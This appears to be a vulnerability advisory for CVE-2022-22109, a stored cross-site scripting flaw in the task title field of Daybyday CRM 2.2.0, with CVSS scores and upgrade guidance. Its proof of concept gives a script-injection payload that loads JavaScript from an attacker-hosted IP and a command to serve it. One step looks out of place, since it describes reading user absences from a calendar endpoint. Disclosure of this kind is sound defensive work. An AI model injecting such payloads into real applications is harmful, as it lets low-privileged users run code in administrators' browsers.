icon

We found results for “

CVE-2022-22109

Date: January 5, 2022

Overview

In Daybyday CRM, version 2.2.0 is vulnerable to Stored Cross-Site Scripting (XSS) vulnerability that allows low privileged application users to store malicious scripts in the title field of new tasks. These scripts are executed in a victim’s browser when they open the “/tasks” page to view all the tasks.

Details

Daybyday CRM is affected by a stored XSS vulnerability that allows low privileged application users (having permission to create tasks) to store malicious scripts in the title field of new tasks. These scripts are executed in a victim’s browser when they open the “/tasks” page to view all the tasks.

PoC Details

For demonstration purposes we'll use 2 users:
test@user.com (low privileged user)
admin@admin.com (administrator)
Login to the application as test@user.com, which has a role Employee and has permissions to create tasks.
Go to “New Task” from the left pane and create a new task. Inject the below payload in the Title field and click on Create Task button. The payload includes the attacker's remote machine from which they load javascript malicious code.
On the attacker’s machine, create a file called “test.js” with contents as given below.
Run a PHP server to host the “test.js” file.
Login as admin@admin.com and go to All Tasks from the left pane, and will notice that an alert pops up with content hosted on the PHP server.
Login with test@user.com. Add “/users/calendar-users” to the url, and the absences for all the users will be available in the returned JSON data.

PoC Code

// Payload
"></a><script type="text/javascript" src="http://192.168.18.40:9999/test.js"></script>
// “test.js” contents:
alert(“This proves my POC works :)”);
// Command to run the PHP server
php -S 192.168.18.40:9999

Affected Environments

bottelet/flarepoint - 2.2.0

Prevention

Update to 2.2.1 in "bottelet/flarepoint" package, 2.2.1 in "Bottelet/DaybydayCRM" repo.

Language: PHP

Good to know:

icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

Upgrade to version bottelet/flarepoint - 2.2.1

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information: